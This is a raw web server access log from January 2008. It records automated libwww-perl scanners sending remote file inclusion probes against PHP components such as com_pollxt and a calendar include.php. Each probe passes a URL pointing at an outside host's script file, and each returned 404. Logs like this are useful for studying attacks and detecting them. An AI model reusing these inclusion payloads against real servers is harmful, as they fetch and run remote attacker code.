195.22.10.83 - - [06/Jan/2008:17:45:47 -0800] "GET /logs/access_071029.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:17:45:47 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:17:45:48 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.60.121.56 - - [06/Jan/2008:17:45:52 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://lindapoker.com/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:52 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:52 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:52 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:52 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:53 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:53 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.60.121.56 - - [06/Jan/2008:17:45:53 -0800] "GET /logs/access_071014.log//calendar/include.php?path[docroot]=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:53 -0800] "GET /logs//calendar/include.php?path[docroot]=http://lindapoker.com/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:53 -0800] "GET /logs//calendar/include.php?path[docroot]=http://www.northshoreclassifieds.com/chat/chat/localization/spanish/vhost/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:54 -0800] "GET /logs//calendar/include.php?path[docroot]=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:54 -0800] "GET /logs//calendar/include.php?path[docroot]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:54 -0800] "GET /logs//calendar/include.php?path[docroot]=http://ofla.bravehost.com/b/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:54 -0800] "GET /logs//calendar/include.php?path[docroot]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.60.121.56 - - [06/Jan/2008:17:45:54 -0800] "GET /logs//calendar/include.php?path[docroot]=http://h1.ripway.com/korax/ardan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.60.121.56 - - [06/Jan/2008:17:45:55 -0800] "GET /logs//calendar/include.php?path[docroot]=http://shop.ilyichevsk.net/administrator/components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.226.196 - - [06/Jan/2008:17:46:35 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:17:46:50 -0800] "GET /logs/access_070827.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.193.226.196 - - [06/Jan/2008:17:46:57 -0800] "GET /logs/access_071029.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci